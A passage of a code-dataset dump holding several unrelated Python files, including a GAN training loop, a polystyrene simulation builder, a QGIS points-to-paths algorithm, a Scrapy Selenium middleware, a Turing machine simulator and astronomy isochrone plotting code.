-torch.mean(out_fake) \\\n\n lossG.backward()\n optimizerG.step()\n\n # Print training stats\n if i % n_print == 0:\n print(\n \"[Epoch {:5}/{:5}] [Batch {:3}/{:3}] [D loss: {:2.6f}] [G loss: {:2.6f}]\".format(\n epoch, n_epochs, i, len(loader['train']), lossD.item(), lossG.item()\n )\n )\n\n\n # Save losses in history and update plot\n with torch.no_grad():\n history['imgs'] += [netG(fixed_noise).detach().cpu()]\n avgStart, avgEnd, valid = avg_start_end(history['imgs'][-1].detach(), start_max, end_max, start_min, end_min)\n\n history['lossD'] += [lossD.item()]\n history['lossG'] += [lossG.item()]\n history['avgStart'] += [avgStart.item()]\n history['avgEnd'] += [avgEnd.item()]\n history['valid'] += [valid.item()]\n history['validHist'] += [sum(history['valid'][-20:]) / len(history['valid'][-20:])]\n history['epoch'] += [epoch]\n\n viz.line(\n Y=Tensor(history['lossD']),\n X=Tensor(history['epoch']),\n win=winD,\n update='replace'\n )\n\n viz.line(\n Y=Tensor(history['lossG']),\n X=Tensor(history['epoch']),\n win=winG,\n update='replace'\n )\n\n viz.line(\n Y=Tensor(history['valid']),\n X=Tensor(history['epoch']),\n win=winValid,\n update='replace'\n )\n\n viz.line(\n Y=Tensor(history['validHist']),\n X=Tensor(history['epoch']),\n win=winValidHist,\n update='replace'\n )\n\n if epoch % 10 == 0:\n viz.images(\n history['imgs'][-1][:16].detach().round_().flip(2),\n opts=dict(title='Epoch' + str(epoch), width=1000, height=250)\n )\n\nfor i, img in enumerate(history['imgs'][-1].detach().round_().flip(2)):\n torchvision.utils.save_image(img, '../results/img/fake/' + str(i) + '.png')\n\nS = 0\nfor data in loader['train']:\n x_real = data['moves'].type(Tensor).flip(2)\n for i, img in enumerate(x_real):\n torchvision.utils.save_image(img, '../results/img/real/' + str(S + i) + '.png')\n S += x_real.size(0)\n\n\n# Save training output data into json file\nimport json\n\nwith open(\"../results/history\" + \"_nopenalties\" + \"_seed\" + str(seed) + \".csv\", \"w\") as history_file:\n json.dump(\n {k: history[k] for k in ('epoch', 'lossD', 'lossG', 'valid', 'validHist')},\n history_file\n )\n","sub_path":"py/main_pinput.py","file_name":"main_pinput.py","file_ext":"py","file_size_in_byte":9154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"643819991","text":"from google.appengine.ext import db\nimport sys\n\nprint(sys.path)\n\nfrom blog import render_str\nfrom post import Post\nfrom users import Accounts\n\n\nclass Comments(db.Model):\n post_id = db.ReferenceProperty(Post, required=True)\n user = db.ReferenceProperty(Accounts, required=True)\n comment = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n\n def render(self):\n self._render_text = self.comment.replace('\\n', '
')\n return render_str(\"comment.html\", c=self)\n\n @classmethod\n def add_comment(cls, postkey, user, comment):\n comment = Comments(post_id=postkey, user=user, comment=comment)\n comment.put()\n","sub_path":"models/comments.py","file_name":"comments.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"234926252","text":"import numpy as np\nfrom sklearn import svm\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.cluster import KMeans\n\nx= np.asarray([[0,0],[1,0],[0,1],[1,1]])\ny=np.asarray([0,1,1,0])\nd=np.load('data4.npy')\nt=np.load('targ4.npy')\nD=np.abs(d);\nd0=D[:,0]\nd1=D[:,1]\nd2=D[:,2]\nd3=D[:,3]\nd4=D[:,4]\nd5=D[:,5]\nd6=D[:,6]\ndata=np.log10(np.transpose(np.array([d0*d1,d2,d3,d4,d5,d6])))\nmlp = MLPClassifier(hidden_layer_sizes=(100,10,100,100))\nmlp.fit(data,t)\nprint(mlp.predict(data[22:27]))","sub_path":"mpl_trainig.py","file_name":"mpl_trainig.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"418251050","text":"# Make linked list of monomers, atoms. Atactic polystyrene\n# Derek Fujimoto\n# Nov 2017\n\nimport numpy as np\nfrom monomer_node import monomer_node as monomer\nfrom atom_node import atom_node as atom\nfrom polymer_properties import *\nimport random\nfrom data import data\n\nclass polymer_linked(object):\n \"\"\"\n Data fields:\n atoms # list of atoms\n directions # build direction based on plane[0]\n last_atom_id# id number of the last atom in the polymer\n mol # molecule number\n monomers # list of monomers\n nmono # number of monomers \n plane # build plane\n \"\"\"\n \n# =========================================================================== # \n def __init__(self,head_pos,idn_first_atom,mol,nmono=10,plane='xy'):\n \"\"\"\n head_pos: position of first CH2 atom in first monomer\n idn_first_atom: id number of first atom in first monomer\n nmono: number of monomers per polymer chain\n plane: plane to build in. Monomers along plane[0]. Rings along \n plane[1]\n \"\"\"\n \n # set\n self.nmono = nmono\n self.plane = plane\n self.monomers = []\n self.mol = mol\n \n # pick monomer build direction\n if plane[0] == 'x': self.direction = np.array([1,0,0])\n elif plane[0] == 'y': self.direction = np.array([0,1,0])\n elif plane[0] == 'z': self.direction = np.array([0,0,1])\n\n # Build monomers\n self.build(head_pos,idn_first_atom)\n \n# =========================================================================== #\n def atom_list_nested_2_id(self,atoms):\n \"\"\"\n Recursively turn a list of atom objects into id numbers. \n \"\"\"\n if type(atoms) == list:\n return [self.atom_list_nested_2_id(a) for a in atoms]\n else:\n return atoms.idn\n\n# =========================================================================== #\n def build(self,head_pos,id_start):\n \"\"\"Make polymer chain\"\"\"\n \n # make the first monomer\n m = monomer(head_pos,id_start,mol=self.mol,plane=self.plane)\n self.monomers.append(m)\n \n # make nmono monomers\n for i in xrange(1,self.nmono):\n \n # last atom in previous monomer\n last_prev = self.monomers[-1].last\n id_next = self.monomers[-1].atoms[-1].idn+1\n \n # get orientation\n downup = random.randint(0,1) # 0 == up, 1 == down\n headtail = 0#random.randint(0,1) # 0 == tail, 1 == head #########\n \n # make a monomer and choose head/tail orientation\n if headtail:\n m = monomer(last_prev.pos,id_next,self.mol,1,0,self.plane)\n m.flip(self.plane[0])\n else:\n m = monomer(last_prev.pos,id_next,self.mol,0,1,self.plane)\n \n # choose up/down orientation\n if downup:\n m.flip(self.plane[1])\n \n # shift position \n dx_actual = last_prev.pos-m.first.pos \n dx_target = key_lookup(bond_len,\"%s-%s\"%\\\n (last_prev.species,m.first.species ))*self.direction\n m.translate(dx_target+dx_actual)\n \n # bond atoms in monomers together\n last_prev.bonded.append(m.first)\n m.first.bonded.append(last_prev)\n \n # append\n self.monomers.append(m)\n \n # get the full list of atoms\n self.atoms = []\n for m in self.monomers:\n for a in m.atoms:\n self.atoms.append(a)\n \n # add one final atom to the chain\n if self.monomers[-1].last.species != 'ch2':\n \n # get position\n last_prev = self.monomers[-1].last\n dx = key_lookup(bond_len,\"%s-%s\"%(last_prev.species,'ch2'))\n pos = last_prev.pos + dx*self.direction\n self.last_atom_id = self.monomers[-1].atoms[-1].idn+1\n a = atom('ch2',self.last_atom_id,self.mol,pos)\n \n # bonding\n a.bonded.append(last_prev)\n last_prev.bonded.append(a)\n \n # add\n self.atoms.append(a)\n \n return\n\n# =========================================================================== #\n def get_atom_by_idn(self,idn):\n for a in self.atoms:\n if a.idn == idn:\n return a\n return -1\n\n# =========================================================================== #\n def get_angles(self,coeff=False):\n \"\"\"\n Find all angles. Assign types matching set coeffs. \n \n Return (coeff,assignments)\n \"\"\"\n \n type_id = type2num(angle_angle)\n \n # get bond coeffs ---------------------------------------------------\n if coeff:\n angle_coeff = []\n for ang in type_id.keys():\n epsilon = angle_energy[ang]*j2cal\n theta = angle_angle[ang]\n angle_coeff.append(\"%d %f %f\\n\" % (type_id[ang],epsilon,theta))\n return angle_coeff\n \n # get list of all angles ---------------------------------------------\n else:\n line = \"%d %d %d %d %d\\n\" # id type atom1 atom2 atom3\n \n # get the head atom\n atom = self.monomers[0].atoms[0]\n \n # walk the atom list\n visited,angles = self.path_walker(self.monomers[0].atoms[0],1)\n angle_lines = []\n for i,a in enumerate(angles):\n species1 = self.get_atom_by_idn(a[0]).species\n species2 = self.get_atom_by_idn(a[1]).species\n species3 = self.get_atom_by_idn(a[2]).species\n species_num = key_lookup(type_id,species2)\n \n angle_lines.append(line % (i+1,species_num,a[0],a[1],a[2]))\n return angle_lines\n\n# =========================================================================== #\n def get_atoms(self,coeff=False):\n \"\"\"\n Set atom locations.\n \n Return (masses,positions)\n \"\"\"\n type_id = type2num(nonbond_len)\n \n # mass\n if coeff:\n masses = []\n for k in mass.keys():\n idn = type_id[k]\n masses.append(\"%d %f\\n\" % (idn,mass[k]))\n return masses\n \n # atom positions\n else:\n atom_pos = []\n for a in self.atoms:\n s = \"%d %d %d \" % (a.idn,a.mol,type_id[a.species])\n s += \"%f %f %f \" % tuple(a.pos)\n s += \"%f %f %f\\n\" % (0,0,0) # images\n atom_pos.append(s) \n return atom_pos\n\n# =========================================================================== #\n def get_bonds(self,coeff=False):\n \"\"\"\n Find all bonds. Assign types matching set coeffs. \n \n Return (coeff,assignments)\n \"\"\"\n \n type_id = type2num(bond_len)\n \n # get bond coeffs ---------------------------------------------------\n if coeff:\n \n bond_coeff = []\n for b in type_id.keys():\n epsilon = bond_energy[b]*j2cal\n sigma = bond_len[b]\n bond_coeff.append(\"%d %f %f\\n\" % (type_id[b],epsilon,sigma))\n return bond_coeff\n \n # get list of all bonds ---------------------------------------------\n else:\n line = \"%d %d %d %d\\n\" # id type atom1 atom2\n \n # get the head atoms\n atom = self.monomers[0].atoms[0]\n \n # walk the atom list\n visited,bonds = self.path_walker(self.monomers[0].atoms[0],0)\n bond_lines = []\n for i,b in enumerate(bonds):\n species1 = self.get_atom_by_idn(b[0]).species\n species2 = self.get_atom_by_idn(b[1]).species\n species_num = key_lookup(type_id,'%s-%s'%(species1,species2))\n \n bond_lines.append(line % (i+1,species_num,b[0],b[1]))\n return bond_lines\n\n# =========================================================================== #\n def get_dihedrals(self,coeff=False):\n \"\"\"\n Find all dihedrals. Assign types matching set coeffs. \n \n Return (coeff,assignments)\n \"\"\"\n \n type_id = type2num(dihedral_energy)\n \n # get bond coeffs ---------------------------------------------------\n if coeff:\n \n dihedral_coeff = []\n for b in type_id.keys():\n epsilon = dihedral_energy[b]*j2cal\n n = dihedral_n[b]\n d = dihedral_d[b]\n dihedral_coeff.append(\"%d %f %d %d\\n\" % \\\n (type_id[b],epsilon,int(d),int(n)))\n return dihedral_coeff\n \n # get list of all dihedrals ----------------------------------------\n else:\n line = \"%d %d %d %d %d %d\\n\" # id type atom1 atom2 atom3 atom4\n \n # get the head atoms\n atom = self.monomers[0].atoms[0]\n \n # walk the atom list\n visited,dihedrals = self.path_walker(self.monomers[0].atoms[0],2)\n dihedral_lines = []\n for i,b in enumerate(dihedrals):\n species1 = self.get_atom_by_idn(b[0]).species\n species2 = self.get_atom_by_idn(b[1]).species\n species3 = self.get_atom_by_idn(b[2]).species\n species4 = self.get_atom_by_idn(b[3]).species\n species_num = key_lookup(type_id,'%s-%s'%(species2,species3))\n \n dihedral_lines.append(line % (i+1,species_num,b[0],b[1],b[2],b[3]))\n return dihedral_lines\n\n# =========================================================================== #\n def get_impropers(self,coeff=False):\n \"\"\"\n Find all impropers. Assign types matching set coeffs. \n \n Return (coeff,assignments)\n \"\"\"\n \n type_id = type2num(improper_energy)\n \n # get improper coeffs ---------------------------------------------------\n if coeff: \n improper_coeff = []\n for b in type_id.keys():\n epsilon = improper_energy[b]*j2cal\n n = improper_n[b]\n d = improper_d[b]\n improper_coeff.append(\"%d %f %d %d\\n\" % \\\n (type_id[b],epsilon,int(d),int(n)))\n return improper_coeff\n \n # get list of all impropers ----------------------------------------\n else:\n # get list of 3-paths eminating from target points\n good_keys = improper_energy.keys()\n paths = {}\n for k in good_keys:\n paths[k] = []\n \n for a in self.atoms:\n ptests = self.path_depth_walker(a,depth=1)\n for p in ptests:\n if p[1].species in good_keys:\n paths[p[1].species].append(p)\n \n # find the fourth members: the odd man out\n for k in paths.keys():\n for p in paths[k]:\n core_atom = p[1]\n for b in core_atom.bonded:\n if not b in p:\n p.append(b)\n break\n \n # translate to numbers\n paths[k] = self.atom_list_nested_2_id(paths[k])\n \n line = \"%d %d %d %d %d %d\\n\" # id type atom1 atom2 atom3 atom4\n \n # get the head atoms\n atom = self.monomers[0].atoms[0]\n \n # print\n i=1\n impropers = []\n for k in paths.keys():\n for p in paths[k]:\n species1 = self.get_atom_by_idn(p[0]).species\n species2 = self.get_atom_by_idn(p[1]).species\n species3 = self.get_atom_by_idn(p[2]).species\n species4 = self.get_atom_by_idn(p[3]).species\n species_num = key_lookup(type_id,'%s'%species2)\n \n impropers.append(line%(i,species_num,p[0],p[1],p[2],p[3]))\n i += 1\n return impropers\n\n# =========================================================================== #\n def get_pairs(self):\n \"\"\"\n Find all unique pair combinations and set list of pair potential \n values. Use only the first monomer for the search.\n \"\"\"\n\n # get all unique species types\n m = self.monomers[0]\n species = np.unique([a.species for a in m.atoms])\n \n # get all permutations of pair types\n permutations = [[a,b] for a in species for b in species]\n \n # get atom numerical species numbers\n type_id = type2num(nonbond_len)\n\n # iterate over pair permutations and make strings for pair lines\n pair_coeff = []\n pairij_coeff = []\n for p in permutations:\n epsilon = np.sqrt(nonbond_energy[p[0]]*nonbond_energy[p[1]])*j2cal\n sigma = (nonbond_len[p[0]]+nonbond_len[p[1]])/2.\n \n p_num = [type_id[pi] for pi in p]\n \n p1 = np.min(p_num)\n p2 = np.max(p_num)\n \n if p1 == p2:\n pair_coeff.append(\"%d %d %f %f %f\\n\" % \\\n (p1,p2,epsilon,sigma,nonbond_cutoff))\n else:\n s = \"%d %d %f %f %f\\n\" % (p1,p2,epsilon,sigma,nonbond_cutoff)\n if not s in pairij_coeff:\n pairij_coeff.append(s)\n return (pair_coeff,pairij_coeff)\n \n# =========================================================================== #\n def path_depth_walker(self,atom,depth=1,exclude=None):\n \"\"\"\n Walk the atom graph a distance depth. Return all available paths.\n \"\"\"\n \n # exclude list\n if exclude == None:\n exclude = set([atom])\n else:\n exclude.add(atom)\n \n # end condition\n if depth < 0:\n return [[atom]]\n \n # add to visited\n paths = []\n \n # visit all atoms in atom's bonded list\n for a in atom.bonded:\n for path in self.path_depth_walker(a,depth-1):\n if not atom in path:\n paths.append([atom]+path)\n exclude.remove(atom)\n \n # finish\n return paths\n\n# =========================================================================== #\n def path_walker(self,atom,pathlen=1,visited=None,paths=None):\n \"\"\"\n Walk the atom graph. Return all paths of length \"depth\".\n \n Step1: Walk over all atoms in the graph. Assume this atom is the \n start of the path\n \n Step2: At each atom attempt to find a path by walking again at a \n depth of pathlen into the graph.\n \"\"\"\n \n # new memory assignment\n if visited == None:\n visited = []\n if paths == None:\n paths = []\n \n # end condition\n if atom.idn in visited:\n return (visited,paths)\n \n # add to visited\n visited.append(atom.idn)\n \n # add to path list\n pathlist = self.path_depth_walker(atom,depth=pathlen)\n paths.extend(self.atom_list_nested_2_id(pathlist))\n \n # remove duplicates independent of ordering\n u,i = np.unique(np.sort(paths,axis=1),axis=0,return_index=True)\n paths = np.array(paths)[i].tolist()\n \n # visit all atoms in atom's bonded list\n for a in atom.bonded:\n visited,paths = self.path_walker(a,pathlen,visited,paths)\n \n # finish\n return (visited,paths)\n","sub_path":"sim_builder/polymer_linked.py","file_name":"polymer_linked.py","file_ext":"py","file_size_in_byte":16383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"558002505","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n***************************************************************************\n PointsToPaths.py\n ---------------------\n Date : April 2014\n Copyright : (C) 2014 by Alexander Bruy\n Email : alexander dot bruy at gmail dot com\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. *\n* *\n***************************************************************************\n\"\"\"\n\n__author__ = 'Alexander Bruy'\n__date__ = 'April 2014'\n__copyright__ = '(C) 2014, Alexander Bruy'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport os\nfrom datetime import datetime\n\nfrom PyQt4.QtCore import QVariant\nfrom qgis.core import QGis, QgsFeature, QgsFields, QgsField, QgsGeometry, QgsDistanceArea\n\nfrom processing.core.GeoAlgorithm import GeoAlgorithm\nfrom processing.core.parameters import ParameterVector\nfrom processing.core.parameters import ParameterTableField\nfrom processing.core.parameters import ParameterString\nfrom processing.core.outputs import OutputVector\nfrom processing.core.outputs import OutputDirectory\nfrom processing.tools import dataobjects, vector\n\n\nclass PointsToPaths(GeoAlgorithm):\n\n VECTOR = 'VECTOR'\n GROUP_FIELD = 'GROUP_FIELD'\n ORDER_FIELD = 'ORDER_FIELD'\n DATE_FORMAT = 'DATE_FORMAT'\n #GAP_PERIOD = 'GAP_PERIOD'\n OUTPUT_LINES = 'OUTPUT_LINES'\n OUTPUT_TEXT = 'OUTPUT_TEXT'\n\n def defineCharacteristics(self):\n self.name, self.i18n_name = self.trAlgorithm('Points to path')\n self.group, self.i18n_group = self.trAlgorithm('Vector creation tools')\n self.addParameter(ParameterVector(self.VECTOR,\n self.tr('Input point layer'), [ParameterVector.VECTOR_TYPE_POINT]))\n self.addParameter(ParameterTableField(self.GROUP_FIELD,\n self.tr('Group field'), self.VECTOR))\n self.addParameter(ParameterTableField(self.ORDER_FIELD,\n self.tr('Order field'), self.VECTOR))\n self.addParameter(ParameterString(self.DATE_FORMAT,\n self.tr('Date format (if order field is DateTime)'), '', optional=True))\n #self.addParameter(ParameterNumber(\n # self.GAP_PERIOD,\n # 'Gap period (if order field is DateTime)', 0, 60, 0))\n self.addOutput(OutputVector(self.OUTPUT_LINES, self.tr('Paths')))\n self.addOutput(OutputDirectory(self.OUTPUT_TEXT, self.tr('Directory')))\n\n def processAlgorithm(self, progress):\n layer = dataobjects.getObjectFromUri(\n self.getParameterValue(self.VECTOR))\n groupField = self.getParameterValue(self.GROUP_FIELD)\n orderField = self.getParameterValue(self.ORDER_FIELD)\n dateFormat = unicode(self.getParameterValue(self.DATE_FORMAT))\n #gap = int(self.getParameterValue(self.GAP_PERIOD))\n dirName = self.getOutputValue(self.OUTPUT_TEXT)\n\n fields = QgsFields()\n fields.append(QgsField('group', QVariant.String, '', 254, 0))\n fields.append(QgsField('begin', QVariant.String, '', 254, 0))\n fields.append(QgsField('end', QVariant.String, '', 254, 0))\n writer = self.getOutputFromName(self.OUTPUT_LINES).getVectorWriter(\n fields, QGis.WKBLineString, layer.dataProvider().crs())\n\n points = dict()\n features = vector.features(layer)\n total = 100.0 / len(features)\n for current, f in enumerate(features):\n point = f.geometry().asPoint()\n group = f[groupField]\n order = f[orderField]\n if dateFormat != '':\n order = datetime.strptime(unicode(order), dateFormat)\n if group in points:\n points[group].append((order, point))\n else:\n points[group] = [(order, point)]\n\n progress.setPercentage(int(current * total))\n\n progress.setPercentage(0)\n\n da = QgsDistanceArea()\n\n current = 0\n total = 100.0 / len(points)\n for group, vertices in points.iteritems():\n vertices.sort()\n f = QgsFeature()\n f.initAttributes(len(fields))\n f.setFields(fields)\n f['group'] = group\n f['begin'] = vertices[0][0]\n f['end'] = vertices[-1][0]\n\n fileName = os.path.join(dirName, '%s.txt' % group)\n\n fl = open(fileName, 'w')\n fl.write('angle=Azimuth\\n')\n fl.write('heading=Coordinate_System\\n')\n fl.write('dist_units=Default\\n')\n\n line = []\n i = 0\n for node in vertices:\n line.append(node[1])\n\n if i == 0:\n fl.write('startAt=%f;%f;90\\n' % (node[1].x(), node[1].y()))\n fl.write('survey=Polygonal\\n')\n fl.write('[data]\\n')\n else:\n angle = line[i - 1].azimuth(line[i])\n distance = da.measureLine(line[i - 1], line[i])\n fl.write('%f;%f;90\\n' % (angle, distance))\n\n i += 1\n\n f.setGeometry(QgsGeometry.fromPolyline(line))\n writer.addFeature(f)\n current += 1\n progress.setPercentage(int(current * total))\n\n del writer\n fl.close()\n","sub_path":"processing/algs/qgis/PointsToPaths.py","file_name":"PointsToPaths.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"26681195","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nfrom selenium import webdriver\nimport scrapy\nimport time\n\n\n# 自定义下载器Chrome()\nclass ChromeMidddlewares(object):\n def process_request(self, request, spider):\n url = request.url\n if url != 'https://www.aqistudy.cn/historydata/':\n # 1.创建浏览器对象\n options = webdriver.ChromeOptions()\n options.add_argument('--headless')\n options.add_argument('--disable-gpu')\n driver = webdriver.Chrome(options=options)\n\n # 2.发请求\n driver.get(url)\n\n # 千万注意延迟\n time.sleep(3)\n\n # 3.获取数据\n data = driver.page_source\n\n # 4.关闭浏览器\n driver.quit()\n\n # 将自定义的下载器 下载内容 包装秤 response对象; HtmlResponse\n # url\n # body\n # encoding='utf-8'\n # reuqest\n return scrapy.http.HtmlResponse(url=url, body=data.encode('utf-8'), encoding=\"utf-8\", request=request)\n","sub_path":"scrapy_pro/laoshi04/AQI/AQI/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"579978812","text":"#!usr/bin/python\r\n# -*- coding:utf-8 -*-\r\n\r\n\r\nfrom data import read_file, check, new_word, put_head, rm_space\r\nfrom Block import Block\r\n\r\n\r\nSTEPS_MAX = 500\r\n\r\n\r\nclass TuringMachine():\r\n\r\n def __init__(self, file, config):\r\n\r\n self.exec_type = 'v'\r\n self.steps = STEPS_MAX\r\n self.delimiter = ['(', ')']\r\n if config is not None:\r\n self.set_config(config)\r\n self.blocks = {}\r\n self.build_tm_sim(file)\r\n self.exec_stack = []\r\n self.current_block = 'main'\r\n self.current_state = self.blocks[self.current_block].init_state\r\n self.word = 'aba'\r\n self.len_word = len(self.word)\r\n self.second_tape = '-'\r\n self.head = 0\r\n self.reading = ''\r\n self.finalize = False\r\n self.break_point = False\r\n\r\n def build_tm_sim(self, file):\r\n lines = read_file(file)\r\n i = 0\r\n while i < len(lines):\r\n line = lines[i]\r\n if line[0] == 'bloco' and (len(line) == 3 or len(line) == 4):\r\n name = line[1]\r\n init_state = line[2]\r\n self.blocks[name] = Block(init_state)\r\n i += 1\r\n line = lines[i]\r\n while line[0] != 'fim':\r\n if check(line):\r\n self.blocks[name].add_state(line)\r\n else:\r\n self.finalize = True\r\n break\r\n i += 1\r\n line = lines[i]\r\n else:\r\n print('Arquivo não está no formato correto.')\r\n self.finalize = True\r\n i += 1\r\n\r\n def set_config(self, config):\r\n self.set_type_execution(config)\r\n if \"-head\" in config:\r\n i = config.index(\"-head\")\r\n self.delimiter = [config[i+1][0], config[i+1][1]]\r\n\r\n def up_config(self, config):\r\n if config != []:\r\n self.set_type_execution(config)\r\n\r\n def set_type_execution(self, config):\r\n if ('-step' in config) or ('-s' in config):\r\n if '-step' in config:\r\n i = config.index('-step')\r\n else:\r\n i = config.index('-s')\r\n try:\r\n self.steps = int(config[i+1])\r\n except (ValueError, IndexError):\r\n pass\r\n self.exec_type = 's'\r\n else:\r\n if ('-resume' in config) or ('-r' in config):\r\n self.exec_type = 'r'\r\n self.steps = STEPS_MAX\r\n elif ('-verbose' in config) or ('-v' in config):\r\n self.exec_type = 'v'\r\n self.steps = STEPS_MAX\r\n\r\n###############################################################################\r\n\r\n def execute(self):\r\n for _ in range(self.steps):\r\n if self.exec_type != 'r':\r\n print(self.instant_config())\r\n else:\r\n self.instant_config()\r\n self.do_transition()\r\n if self.break_point:\r\n self.break_point = False\r\n break\r\n if self.finalize:\r\n return\r\n\r\n def instant_config(self):\r\n self.word, word = put_head(self.word, self.head, self.delimiter)\r\n return '{:.>16}'.format(self.current_block) + '.' + \\\r\n '{:0>4}'.format(self.current_state) + ' : ' + \\\r\n '{:_^43}'.format(word) + ' : ' + self.second_tape\r\n\r\n def do_transition(self):\r\n state = self.blocks[self.current_block].states[self.current_state]\r\n self.reading = self.word[self.head]\r\n\r\n # executa transição\r\n if (self.reading in state.transitions) or ('*' in state.transitions):\r\n if self.reading in state.transitions:\r\n t = state.transitions[self.reading]\r\n else:\r\n t = state.transitions['*']\r\n self.transition(t)\r\n else:\r\n # segunda fita\r\n st_transitions = {}\r\n st = False\r\n for t in state.transitions:\r\n if t[0] == '[' and t[-1] == ']':\r\n st_transitions[t[1:-1]] = state.transitions[t]\r\n if len(st_transitions) != 0:\r\n if self.second_tape in st_transitions:\r\n sym = '['+self.second_tape+']'\r\n st = True\r\n elif '*' in st_transitions:\r\n sym = '[*]'\r\n st = True\r\n if st:\r\n t = state.transitions[sym]\r\n self.transition(t)\r\n st = False\r\n elif 'copiar' in state.transitions:\r\n t = state.transitions['copiar']\r\n self.second_tape = self.reading\r\n self.current_state = state.transitions['copiar'][0]\r\n elif 'colar' in state.transitions:\r\n t = state.transitions['colar']\r\n self.word = new_word(self.word, self.head, self.second_tape)\r\n self.current_state = state.transitions['colar'][0]\r\n # novo bloco\r\n else:\r\n for key in state.transitions:\r\n if key in self.blocks:\r\n t = state.transitions[key]\r\n self.exec_stack.append(self.current_block)\r\n self.exec_stack.append(state.transitions[key][0])\r\n self.current_block = key\r\n self.current_state = self.blocks[key].init_state\r\n if self.current_state == 'retorne':\r\n self.current_state = self.exec_stack.pop()\r\n self.current_block = self.exec_stack.pop()\r\n\r\n if t[-1] == '!':\r\n print('\\nBreak Point')\r\n self.break_point = True\r\n\r\n def transition(self, t):\r\n new_sym = t[0]\r\n move = t[1]\r\n new_state = t[2]\r\n if new_sym != '*':\r\n self.word = new_word(self.word, self.head, new_sym)\r\n self.movement(move)\r\n if new_state != '*':\r\n self.current_state = new_state\r\n if self.current_state == 'aceite':\r\n self.aceita()\r\n self.finalize = True\r\n elif self.current_state == 'rejeite':\r\n self.rejeita()\r\n self.finalize = True\r\n elif self.current_state == 'retorne':\r\n self.current_state = self.exec_stack.pop()\r\n self.current_block = self.exec_stack.pop()\r\n\r\n def movement(self, move):\r\n if move == 'e':\r\n if self.head == 0:\r\n self.word = '_' + self.word\r\n else:\r\n self.head -= 1\r\n if move == 'd':\r\n if self.head == self.len_word - 1:\r\n self.word = self.word + '_'\r\n self.head += 1\r\n\r\n def aceita(self):\r\n _, word = put_head(self.word, self.head, self.delimiter)\r\n print(self.instant_config())\r\n print('\\nACEITA\\n' + '{:->70}'.format('\\n') + rm_space(word) + \\\r\n '\\n{:->70}'.format('\\n') + 'FIM DA SIMULAÇÃO\\n')\r\n\r\n def rejeita(self):\r\n print(self.instant_config())\r\n _, word = put_head(self.word, self.head, self.delimiter)\r\n print('\\nREJEITA\\n' + '{:->70}'.format('\\n') + rm_space(word) + \\\r\n '\\n{:->70}'.format('\\n') + 'FIM DA SIMULAÇÃO\\n')\r\n","sub_path":"TuringMachine.py","file_name":"TuringMachine.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"600024022","text":"import os, os.path\nimport numpy\nimport isodist\nfrom galpy.util import bovy_plot\nfrom segueSelect import _mr_gi, _gi_gr, _mr_ri_bright, _mr_ri_faint, \\\n _ri_gr\n_EXT='ps'\ndef plotAnIvezicDiff(dir):\n #Load An isochrones\n a= isodist.AnIsochrone()\n #Plot difference for a few metallicities\n fehs= [0.,-0.1,-0.2,-0.3,-0.5,-1.,-1.5]\n colors= ['b','c','g','y','orange','m','r']\n #Set up plot\n bovy_plot.bovy_print()\n bovy_plot.bovy_plot([-100.,-100.],[-100.,-100],'k,',\n #xrange=[0.47,0.58],\n xrange=[0.53,0.78],\n yrange=[-0.25,.25],\n xlabel=r'$g-r\\ [\\mathrm{mag}]$',\n ylabel=r'$\\mathrm{DM}_{\\mathrm{An}}-\\mathrm{DM}_{\\mathrm{Ivezi\\acute{c}}}\\ [\\mathrm{mag}]$')\n xlegend, ylegend, dy= 0.545, 0.2,-0.03\n for ii in range(len(fehs)):\n iso= a(numpy.log10(10.),feh=fehs[ii])\n #Get G dwarfs\n indx= (iso['g']-iso['r'] <= 0.75)*(iso['g']-iso['r'] >= 0.55)\\\n *(iso['logg'] > 4.1)\n y= -1.*(iso['r'][indx]-_mr_gi(_gi_gr(iso['g'][indx]\n -iso['r'][indx]),fehs[ii]))\n bovy_plot.bovy_plot(iso['g'][indx]-iso['r'][indx],\n y,\n '-',color=colors[ii],\n overplot=True)\n bovy_plot.bovy_text(xlegend,ylegend+ii*dy,\n r'$[\\mathrm{Fe/H]=%+4.1f}$' % fehs[ii],\n color=colors[ii])\n bovy_plot.bovy_end_print(os.path.join(dir,'dm_an_ivezic.'+_EXT))\n\ndef plotJuricIvezicDiff(dir):\n #Plot difference for a few metallicities\n fehs= [0.,-0.1,-0.2,-0.3,-0.5,-1.,-1.5]\n colors= ['b','c','g','y','orange','m','r']\n #Set up plot\n bovy_plot.bovy_print()\n bovy_plot.bovy_plot([-100.,-100.],[-100.,-100],'k,',\n xrange=[0.47,0.58],\n yrange=[-1.,1.],\n xlabel=r'$g-r\\ [\\mathrm{mag}]$',\n ylabel=r'$\\mathrm{DM}_{\\mathrm{Juri\\acute{c}}}-\\mathrm{DM}_{\\mathrm{Ivezi\\acute{c}}}\\ [\\mathrm{mag}]$')\n xlegend, ylegend, dy= 0.55, 0.8,-0.12\n grs= numpy.linspace(0.48,0.55,1001)\n for ii in range(len(fehs)):\n ybright= -1.*(_mr_ri_bright(_ri_gr(grs))-_mr_gi(_gi_gr(grs),fehs[ii]))\n yfaint= 